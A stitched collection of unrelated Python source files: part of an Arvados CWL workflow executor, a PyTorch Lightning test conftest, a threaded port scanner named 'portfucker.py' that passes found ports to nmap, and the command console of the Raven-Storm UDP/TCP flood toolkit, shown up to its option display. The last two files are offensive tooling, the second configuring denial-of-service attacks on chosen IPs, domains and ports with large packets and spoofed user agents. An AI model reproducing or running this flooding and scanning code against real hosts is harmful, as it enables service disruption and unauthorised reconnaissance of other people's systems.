self.api.collections().update(uuid=self.final_output_collection.manifest_locator(),
body={
'is_trashed': True
}).execute(num_retries=self.num_retries)
except Exception:
logger.exception("Setting container output")
raise
def apply_reqs(self, job_order_object, tool):
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if tool.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1 or greater and re-run with "
"--enable-dev.")
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
for req in job_reqs:
tool.requirements.append(req)
def arv_executor(self, updated_tool, job_order, runtimeContext, logger=None):
self.debug = runtimeContext.debug
workbench1 = self.api.config()["Services"]["Workbench1"]["ExternalURL"]
workbench2 = self.api.config()["Services"]["Workbench2"]["ExternalURL"]
controller = self.api.config()["Services"]["Controller"]["ExternalURL"]
logger.info("Using cluster %s (%s)", self.api.config()["ClusterID"], workbench2 or workbench1 or controller)
updated_tool.visit(self.check_features)
self.pipeline = None
self.fs_access = runtimeContext.make_fs_access(runtimeContext.basedir)
self.secret_store = runtimeContext.secret_store
self.trash_intermediate = runtimeContext.trash_intermediate
if self.trash_intermediate and self.work_api != "containers":
raise Exception("--trash-intermediate is only supported with --api=containers.")
self.intermediate_output_ttl = runtimeContext.intermediate_output_ttl
if self.intermediate_output_ttl and self.work_api != "containers":
raise Exception("--intermediate-output-ttl is only supported with --api=containers.")
if self.intermediate_output_ttl < 0:
raise Exception("Invalid value %d for --intermediate-output-ttl, cannot be less than zero" % self.intermediate_output_ttl)
if runtimeContext.submit_request_uuid and self.work_api != "containers":
raise Exception("--submit-request-uuid requires containers API, but using '{}' api".format(self.work_api))
runtimeContext = runtimeContext.copy()
default_storage_classes = ",".join([k for k,v in self.api.config().get("StorageClasses", {"default": {"Default": True}}).items() if v.get("Default") is True])
if runtimeContext.storage_classes == "default":
runtimeContext.storage_classes = default_storage_classes
if runtimeContext.intermediate_storage_classes == "default":
runtimeContext.intermediate_storage_classes = default_storage_classes
if not runtimeContext.name:
runtimeContext.name = self.name = updated_tool.tool.get("label") or updated_tool.metadata.get("label") or os.path.basename(updated_tool.tool["id"])
if runtimeContext.copy_deps is None and (runtimeContext.create_workflow or runtimeContext.update_workflow):
# When creating or updating workflow record, by default
# always copy dependencies and ensure Docker images are up
# to date.
runtimeContext.copy_deps = True
runtimeContext.match_local_docker = True
if runtimeContext.update_workflow and self.project_uuid is None:
# If we are updating a workflow, make sure anything that
# gets uploaded goes into the same parent project, unless
# an alternate --project-uuid was provided.
existing_wf = self.api.workflows().get(uuid=runtimeContext.update_workflow).execute()
runtimeContext.project_uuid = existing_wf["owner_uuid"]
self.project_uuid = runtimeContext.project_uuid
# Upload local file references in the job order.
job_order = upload_job_order(self, "%s input" % runtimeContext.name,
updated_tool, job_order, runtimeContext)
# the last clause means: if it is a command line tool, and we
# are going to wait for the result, and always_submit_runner
# is false, then we don't submit a runner process.
submitting = (runtimeContext.update_workflow or
runtimeContext.create_workflow or
(runtimeContext.submit and not
(updated_tool.tool["class"] == "CommandLineTool" and
runtimeContext.wait and
not runtimeContext.always_submit_runner)))
loadingContext = self.loadingContext.copy()
loadingContext.do_validate = False
if submitting:
loadingContext.do_update = False
# Document may have been auto-updated. Reload the original
# document with updating disabled because we want to
# submit the document with its original CWL version, not
# the auto-updated one.
tool = load_tool(updated_tool.tool["id"], loadingContext)
else:
tool = updated_tool
# Upload direct dependencies of workflow steps, get back mapping of files to keep references.
# Also uploads docker images.
merged_map = upload_workflow_deps(self, tool, runtimeContext)
# Recreate process object (ArvadosWorkflow or
# ArvadosCommandTool) because tool document may have been
# updated by upload_workflow_deps in ways that modify
# inheritance of hints or requirements.
loadingContext.loader = tool.doc_loader
loadingContext.avsc_names = tool.doc_schema
loadingContext.metadata = tool.metadata
tool = load_tool(tool.tool, loadingContext)
if runtimeContext.update_workflow or runtimeContext.create_workflow:
# Create a pipeline template or workflow record and exit.
if self.work_api == "containers":
uuid = upload_workflow(self, tool, job_order,
runtimeContext.project_uuid,
runtimeContext,
uuid=runtimeContext.update_workflow,
submit_runner_ram=runtimeContext.submit_runner_ram,
name=runtimeContext.name,
merged_map=merged_map,
submit_runner_image=runtimeContext.submit_runner_image)
self.stdout.write(uuid + "\n")
return (None, "success")
self.apply_reqs(job_order, tool)
self.ignore_docker_for_reuse = runtimeContext.ignore_docker_for_reuse
self.eval_timeout = runtimeContext.eval_timeout
runtimeContext.use_container = True
runtimeContext.tmpdir_prefix = "tmp"
runtimeContext.work_api = self.work_api
if not self.output_name:
self.output_name = "Output from workflow %s" % runtimeContext.name
if self.work_api == "containers":
if self.ignore_docker_for_reuse:
raise Exception("--ignore-docker-for-reuse not supported with containers API.")
runtimeContext.outdir = "/var/spool/cwl"
runtimeContext.docker_outdir = "/var/spool/cwl"
runtimeContext.tmpdir = "/tmp"
runtimeContext.docker_tmpdir = "/tmp"
if runtimeContext.priority < 1 or runtimeContext.priority > 1000:
raise Exception("--priority must be in the range 1..1000.")
if self.should_estimate_cache_size:
visited = set()
estimated_size = [0]
def estimate_collection_cache(obj):
if obj.get("location", "").startswith("keep:"):
m = pdh_size.match(obj["location"][5:])
if m and m.group(1) not in visited:
visited.add(m.group(1))
estimated_size[0] += int(m.group(2))
visit_class(job_order, ("File", "Directory"), estimate_collection_cache)
runtimeContext.collection_cache_size = max(((estimated_size[0]*192) // (1024*1024))+1, 256)
self.collection_cache.set_cap(runtimeContext.collection_cache_size*1024*1024)
logger.info("Using collection cache size %s MiB", runtimeContext.collection_cache_size)
runnerjob = None
if runtimeContext.submit:
# Submit a runner job to run the workflow for us.
if self.work_api == "containers":
if submitting:
tool = RunnerContainer(self, updated_tool,
tool, loadingContext, runtimeContext.enable_reuse,
self.output_name,
self.output_tags,
submit_runner_ram=runtimeContext.submit_runner_ram,
name=runtimeContext.name,
on_error=runtimeContext.on_error,
submit_runner_image=runtimeContext.submit_runner_image,
intermediate_output_ttl=runtimeContext.intermediate_output_ttl,
merged_map=merged_map,
priority=runtimeContext.priority,
secret_store=self.secret_store,
collection_cache_size=runtimeContext.collection_cache_size,
collection_cache_is_default=self.should_estimate_cache_size)
else:
runtimeContext.runnerjob = tool.tool["id"]
if runtimeContext.cwl_runner_job is not None:
self.uuid = runtimeContext.cwl_runner_job.get('uuid')
jobiter = tool.job(job_order,
self.output_callback,
runtimeContext)
if runtimeContext.submit and not runtimeContext.wait:
runnerjob = next(jobiter)
runnerjob.run(runtimeContext)
self.stdout.write(runnerjob.uuid+"\n")
return (None, "success")
current_container = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
if current_container:
logger.info("Running inside container %s", current_container.get("uuid"))
self.poll_api = arvados.api('v1', timeout=runtimeContext.http_timeout)
self.polling_thread = threading.Thread(target=self.poll_states)
self.polling_thread.start()
self.task_queue = TaskQueue(self.workflow_eval_lock, self.thread_count)
try:
self.workflow_eval_lock.acquire()
# Holds the lock while this code runs and releases it when
# it is safe to do so in self.workflow_eval_lock.wait(),
# at which point on_message can update job state and
# process output callbacks.
loopperf = Perf(metrics, "jobiter")
loopperf.__enter__()
for runnable in jobiter:
loopperf.__exit__()
if self.stop_polling.is_set():
break
if self.task_queue.error is not None:
raise self.task_queue.error
if runnable:
with Perf(metrics, "run"):
self.start_run(runnable, runtimeContext)
else:
if (self.task_queue.in_flight + len(self.processes)) > 0:
self.workflow_eval_lock.wait(3)
else:
logger.error("Workflow is deadlocked, no runnable processes and not waiting on any pending processes.")
break
if self.stop_polling.is_set():
break
loopperf.__enter__()
loopperf.__exit__()
while (self.task_queue.in_flight + len(self.processes)) > 0:
if self.task_queue.error is not None:
raise self.task_queue.error
self.workflow_eval_lock.wait(3)
except UnsupportedRequirement:
raise
except:
if sys.exc_info()[0] is KeyboardInterrupt or sys.exc_info()[0] is SystemExit:
logger.error("Interrupted, workflow will be cancelled")
elif isinstance(sys.exc_info()[1], WorkflowException):
logger.error("Workflow execution failed:\n%s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
else:
logger.exception("Workflow execution failed")
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
if self.work_api == "containers" and not current_container:
# Not running in a crunch container, so cancel any outstanding processes.
for p in self.processes:
try:
self.api.container_requests().update(uuid=p,
body={"priority": "0"}
).execute(num_retries=self.num_retries)
except Exception:
pass
finally:
self.workflow_eval_lock.release()
self.task_queue.drain()
self.stop_polling.set()
self.polling_thread.join()
self.task_queue.join()
if self.final_status == "UnsupportedRequirement":
raise UnsupportedRequirement("Check log for details.")
if self.final_output is None:
raise WorkflowException("Workflow did not return a result.")
if runtimeContext.submit and isinstance(tool, Runner):
logger.info("Final output collection %s", tool.final_output)
if workbench2 or workbench1:
logger.info("Output at %scollections/%s", workbench2 or workbench1, tool.final_output)
else:
if self.output_tags is None:
self.output_tags = ""
storage_classes = ""
storage_class_req, _ = tool.get_requirement("http://arvados.org/cwl#OutputStorageClass")
if storage_class_req and storage_class_req.get("finalStorageClass"):
storage_classes = aslist(storage_class_req["finalStorageClass"])
else:
storage_classes = runtimeContext.storage_classes.strip().split(",")
output_properties = {}
output_properties_req, _ = tool.get_requirement("http://arvados.org/cwl#OutputCollectionProperties")
if output_properties_req:
builder = make_builder(job_order, tool.hints, tool.requirements, runtimeContext, tool.metadata)
for pr in output_properties_req["outputProperties"]:
output_properties[pr["propertyName"]] = builder.do_eval(pr["propertyValue"])
self.final_output, self.final_output_collection = self.make_output_collection(self.output_name, storage_classes,
self.output_tags, output_properties,
self.final_output)
self.set_crunch_output()
if runtimeContext.compute_checksum:
adjustDirObjs(self.final_output, partial(get_listing, self.fs_access))
adjustFileObjs(self.final_output, partial(compute_checksums, self.fs_access))
if self.trash_intermediate and self.final_status == "success":
self.trash_intermediate_output()
return (self.final_output, self.final_status)
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from functools import partial, wraps
from http.server import SimpleHTTPRequestHandler
from pathlib import Path
import pytest
import torch.distributed
import torch.multiprocessing as mp
from pytorch_lightning.plugins.environments.lightning_environment import find_free_network_port
from tests import _PATH_DATASETS
@pytest.fixture(scope="session")
def datadir():
return Path(_PATH_DATASETS)
@pytest.fixture(scope="function", autouse=True)
def preserve_global_rank_variable():
"""Ensures that the rank_zero_only.rank global variable gets reset in each test."""
from pytorch_lightning.utilities.distributed import rank_zero_only
rank = getattr(rank_zero_only, "rank", None)
yield
if rank is not None:
setattr(rank_zero_only, "rank", rank)
@pytest.fixture(scope="function", autouse=True)
def restore_env_variables():
"""Ensures that environment variables set during the test do not leak out."""
env_backup = os.environ.copy()
yield
leaked_vars = os.environ.keys() - env_backup.keys()
# restore environment as it was before running the test
os.environ.clear()
os.environ.update(env_backup)
# these are currently known leakers - ideally these would not be allowed
allowlist = {
"CUDA_DEVICE_ORDER",
"LOCAL_RANK",
"NODE_RANK",
"WORLD_SIZE",
"MASTER_ADDR",
"MASTER_PORT",
"PL_GLOBAL_SEED",
"PL_SEED_WORKERS",
"WANDB_MODE",
"HOROVOD_FUSION_THRESHOLD",
"RANK", # set by DeepSpeed
"POPLAR_ENGINE_OPTIONS", # set by IPUPlugin
# set by XLA
"XRT_MESH_SERVICE_ADDRESS",
"XRT_TORCH_DIST_ROOT",
}
leaked_vars.difference_update(allowlist)
assert not leaked_vars, f"test is leaking environment variable(s): {set(leaked_vars)}"
@pytest.fixture(scope="function", autouse=True)
def teardown_process_group():
"""Ensures that the distributed process group gets closed before the next test runs."""
yield
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.destroy_process_group()
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple(funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames)
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(("localhost", 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
@pytest.fixture
def single_process_pg():
"""Initialize the default process group with only the current process for testing purposes.
The process group is destroyed when the with block is exited.
"""
if torch.distributed.is_initialized():
raise RuntimeError("Can't use `single_process_pg` when the default process group is already initialized.")
orig_environ = os.environ.copy()
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = str(find_free_network_port())
os.environ["RANK"] = "0"
os.environ["WORLD_SIZE"] = "1"
torch.distributed.init_process_group("gloo")
try:
yield
finally:
torch.distributed.destroy_process_group()
os.environ.clear()
os.environ.update(orig_environ)
|
portfucker.py
|
import threading
from queue import Queue
import time
import socket
import sys
import signal
import os
import argparse
from termcolor import colored
parser = argparse.ArgumentParser(description="Port Fucker | Coded By https://github.com/rootkral4")
parser.add_argument("-i", "--ip", required=True, help="Ip address of host", type=str)
parser.add_argument("-r", "--range", required=False, default="0,1001", help="Scan range default 0,1000", type=str)
parser.add_argument("-t", "--threads", required=False, default=50, help="Threads default 50", type=int)
args = parser.parse_args()
attackip = getattr(args,'ip')
scanrange = getattr(args,'range')
threads = getattr(args,'threads')
scanrange = scanrange.split(",")
print_lock = threading.Lock()
socket.timeout(5)
global portactive
global portlist
portlist = []
portactive = True
print(colored(" 👑 For Real Kings 👑 ", "green"))
print(colored("-" * 40, "magenta"))
print(colored("Url :" + str(attackip), "green"))
print(colored("Port Scan Range :" + str(scanrange[0]) + "-->" + str(scanrange[1]), "green"))
print(colored("Threads :" + str(threads), "green"))
print(colored("-" * 40, "magenta"))
print(colored("rootkral4 | https://github.com/rootkral4","green"))
def portscan(attackip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
con = s.connect((attackip,port))
with print_lock:
portlist.append(port)
con.close()
except:
pass
print("[*] Now Scanning {} [*]".format(port), end="\r")
if port == int(scanrange[1]):
portactive = False
ports = ""
for port in portlist:
ports += str(port) + ","
print(colored("[!] Port Scan Done, Ports ;\n{}\n".format(ports[:-1]),"green"))
os.system("nmap {} -p {} {} -sV".format(attackip, ports[:-1], "-Pn"))
os.kill(os.getpid(), signal.SIGTERM)
def threader():
while True:
worker = q.get()
portscan(attackip, worker)
q.task_done()
if portactive == False:
break
q = Queue()
for x in range(threads):
t = threading.Thread(target=threader, daemon=True).start()
for worker in range(int(scanrange[0]),int(scanrange[1]) + 1):
q.put(worker)
q.join()
|
main.py
|
# 2020
# The Raven-Storm Toolkit was programmed and developed by Taguar258.
# The Raven-Storm Toolkit is published under the MIT Licence.
# The Raven-Storm Toolkit is based on the CLIF-Framework.
# The CLIF-Framework is programmed and developed by Taguar258.
# The CLIF-Framework is published under the MIT Licence.
import socket
from os import getcwd, name, path, system
from random import choice
from sys import version
from threading import Thread
from time import sleep, time
import requests
from CLIF_Framework.framework import event, tools # noqa: I900
event = event()
tools = tools()
class Main:
def __init__(selfie, console): # noqa: N805
global self
global var
self = selfie
var = console # noqa: VNE002
self._add_commands()
# Colors
var.C_None = "\x1b[0;39m"
var.C_Bold = "\x1b[1;39m"
var.C_Green = "\x1b[32m"
var.C_Violet = "\x1b[34m"
var.C_Dark_Blue = "\x1b[35m"
var.C_Red = "\x1b[31m"
var.port = [80] # Port 80 protocol == TCP
var.threads = 160
var.ip = [""]
var.socketmethod = "TCP" # / UDP
var.sleep = 0
var.outtxt = True
var.outtxtmute = False
var.message = "hey, it's me rs."
var.messagezw = var.message
var.rtxt = 1
var.stress = False
var.timeforstress = 1
var.autostart = 0
var.autostop = 0
var.autostep = 0
var.autostarttime = 0 # Will be used as a variable for autostop
var.runactive = True
var.get_url = ""
var.l4_debug = False
var.stoped_threads = 0
var.user_agents = ["Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", "Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; pl-pl) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; nb-no) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00", "Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00", "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; ru; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30", "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)", "Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30", "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)", "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01", "Mozilla/5.0 (iPhone; U; fr; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; ru-ru) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5"]
def _add_commands(self):
event.commands(self.exit_console, ["exit", "quit", "e", "q"])
event.command(self.help)
event.commands(self.run_shell, ".")
event.commands(self.debug, "$")
event.commands(self.show_values, ["values", "ls"])
event.help_comment("|\n|-- Main commands:")
event.help("port", "Set the target's port.")
event.help("threads", "Set the number of threads.")
event.help("ip", "Set the target's IP.")
event.help("web", "Target the ip of a domain.")
event.help("method", "Change attack method between UPD, TCP.")
event.help("sleep", "Set the time delay between each packet send.")
event.help("outtxt", "Output each packets send status: enable/disable.")
event.help("mute", "Do not output the connection reply.")
event.help(["values", "ls"], "Show all selected options.")
event.help("run", "Start the attack.")
event.help_comment("|\n|-- Set Send-text:")
event.help("message", "Set the packt's message.")
event.help("repeat", "Repeat the target's message specific times.")
event.help("mb", "Send specified amount of MB packtes to server.")
event.help("get", "Define the GET Header.")
event.help("agent", "Define a user agent instead of a random ones.")
event.help_comment("|\n|-- Stress Testing:")
event.help("stress", "Enable the Stress-testing mode.")
event.help("st wait", "Set the time between each stress level.")
event.help_comment("|\n|-- Multiple:")
event.help("ips", "Set multple ips to target.")
event.help("webs", "Set multple domains to target.")
event.help("ports", "Attack multiple ports.")
event.help_comment("|\n|-- Automation:")
event.help("auto start", "Set the delay before the attack should start.")
event.help("auto step", "Set the delay between the next thread to activate.")
event.help("auto stop", "Set the delay after the attack should stop.")
def banner(self):
system("clear || cls")
print(("""C_B----------------------------------------------------------C_W
THE CREATOR DOES NOT TAKE ANY RESPONSIBILITY FOR DAMAGE CAUSED.
THE USER ALONE IS RESPONSIBLE, BE IT: ABUSING RAVEN-STORM
TO FIT ILLEGAL PURPOSES OR ACCIDENTAL DAMAGE CAUSED BY RAVEN-STORM.
BY USING THIS SOFTWARE, YOU MUST AGREE TO TAKE FULL RESPONSIBILITY
FOR ANY DAMAGE CAUSED BY RAVEN-STORM.
EVERY ATTACK WILL CAUSE TEMPORARY DAMAGE, BUT LONG-TERM DAMAGE IS
DEFFINITIFLY POSSIBLE.
RAVEN-STORM SHOULD NOT SUGGEST PEOPLE TO PERFORM ILLEGAL ACTIVITIES.
C_B----------------------------------------------------------C_W""").replace("C_W", var.C_None).replace("C_B", var.C_Bold))
self.help()
def exit_console(self):
print("Have a nice day.")
quit()
def run_shell(self, command):
print("")
system(tools.arg("Enter shell command: ", ". ", command))
print("")
def debug(self, command):
print("")
eval(tools.arg("Enter debug command: ", "$ ", command))
print("")
@event.command
def clear():
system("clear || cls")
@event.event
def on_ready():
self.banner()
@event.event
def on_command_not_found(command):
print("")
print("The command you entered does not exist.")
print("")
def check_session(self):
if var.session[1][0] and len(var.session[1][1]) >= 1:
if len(var.session[1][1][0]) >= 1:
run_following = [var.session[1][1][0][0], var.session[1][1][0][0]]
var.session[1][1][0] = var.session[1][1][0][1:]
else:
var.session[1][1] = var.session[1][1][1:]
run_following = [var.session[1][1][0][0], var.session[1][1][0][0]]
var.session[1][1][0] = var.session[1][1][0][1:]
var.run_command = run_following
@event.event
def on_input():
self.check_session()
if var.server[0] and not var.server[1]:
while True:
data = requests.post((var.server[2] + ("get/com%s" % var.server[4])), data={"password": var.server[3]}).text
if data != "500":
var.server[4] = var.server[4] + 1
var.run_command = [data, data]
print(var.ps1 + "\r")
break
else:
sleep(1)
@event.event
def on_interrupt():
print("")
var.stop()
@event.event
def on_command(command):
if var.session[0][0]:
var.session[0][1].write(command + "\n")
if var.server[0] and var.server[1]:
status = requests.post((var.server[2] + "set/com"), data={"password": var.server[3], "data": command}).text
if status != "200":
print("")
print("An error occured, while sending commands to the server.")
print("")
@event.command
def debug():
var.l4_debug = True
print("")
print("Debugging mode enabled.")
print("")
def help(self):
event.help_title("\x1b[1;39mUDP/TCP Flood Help:\x1b[0;39m")
tools.help("| |-- ", " :: ", event)
print("")
@event.command
def port(command):
print("")
try:
var.port = [int(tools.arg("Port: ", "port ", command))]
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def threads(command):
print("")
try:
var.threads = int(tools.arg("Threads: ", "threads ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def ip(command):
print("")
var.ip = [tools.arg("Target: ", "ip ", command)]
if "." not in var.ip[0]:
print("This IP does not exist.")
print("")
@event.command
def web(command):
print(" ")
try:
webtoip = tools.arg("Website: ", "web ", command)
webtoip = webtoip.replace("http://", "")
webtoip = webtoip.replace("https://", "")
webtoiptxt = str(socket.gethostbyname(webtoip))
var.ip = [webtoiptxt]
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def method(command):
print("")
if var.socketmethod == "TCP":
var.socketmethod = "UDP"
print("Method changed to UDP.")
else:
var.socketmethod = "TCP"
print("Method changed to TCP.")
print("")
@event.command
def sleep(command):
print("")
try:
var.sleep = int(tools.arg("Delay in seconds: ", "sleep ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def outtxt(command):
print(" ")
if var.outtxt:
print("The output has been reduced.")
var.outtxt = False
else:
print("The output has been set to normal.")
var.outtxt = True
print(" ")
@event.command
def mute(command):
print(" ")
if var.outtxtmute:
print("The output has been disabled.")
var.outtxtmute = False
else:
print("The output has been enabled.")
var.outtxtmute = True
print(" ")
@event.command
def message(command):
print("")
var.message = tools.arg("Message: ", "message ", command)
var.rtxt = 1
print("")
@event.command
def get(command):
print("")
var.get_url = tools.arg("GET Header: ", "get ", command)
print("")
@event.command
def repeat(command):
print(" ")
try:
rtxtzw = var.rtxt
var.rtxt = int(tools.arg("Repeat message x times: ", "repeat ", command))
if var.rtxt < 1:
print("There was an error while executing.")
else:
if rtxtzw < var.rtxt:
var.messagezw = var.message
var.message = (str(var.message) * int(var.rtxt))
else:
var.message = (str(var.messagezw) * int(var.rtxt))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def mb(command):
print(" ")
try:
setmb = int(tools.arg("Size of Packet in MB: ", "mb ", command))
setmb = int(setmb / 0.000001)
var.message = ("r" * setmb)
var.rtxt = setmb
var.messagezw = "r"
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def stress(command):
print(" ")
if var.stress:
print("The stress mode has been disabled.")
var.stress = False
else:
print("The stress mode has been enabled.")
var.stress = True
print(" ")
@event.command
def st_wait(command):
print("")
try:
var.timeforstress = int(tools.arg("Delay in seconds: ", "st wait ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def ips(command):
print("")
var.ip = tools.arg("Targets (Seperated by ', '): ", "ips ", command).split(", ")
for ip in var.target:
if "." not in ip:
print("This IP does not exist.")
print("")
@event.command
def ports(command):
print("")
try:
var.port = tools.arg("Ports (Seperated by ', '): ", "ports ", command).split(", ")
for port in var.port:
if isinstance(port, int):
print("Entered ports cannot be used.")
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def webs(command):
print(" ")
try:
webtoip = tools.arg("Websites (Seperated by ', '): ", "webs ", command).split(", ")
for pos, web in enumerate(webtoip):
webtoip[pos] = web.replace("http://", "")
webtoip[pos] = webtoip[pos].replace("https://", "")
webtoip[pos] = str(socket.gethostbyname(webtoip[pos]))
var.ip = webtoip
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_step(command):
print(" ")
try:
var.autostep = int(tools.arg("Delay for next thread to activate (in Seconds): ", "auto step ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_start(command):
print(" ")
try:
var.autostart = int(tools.arg("Delay for attack to start (in Seconds): ", "auto start ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_stop(command):
print(" ")
try:
var.autostop = int(tools.arg("Stop the attack after x seconds: ", "auto stop ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def agent(command):
print(" ")
var.user_agents = [tools.arg("Enter a user agent: ", "agent ", command)]
print(" ")
def show_values(self):
print("")
print("Ports: %s" % var.port)
print("Threads: %s" % var.threads)
print("Targets: %s" % var.ip)
print("Method: %s" % var.socketmethod)
print("Time between each packet: %s" % var.sleep)
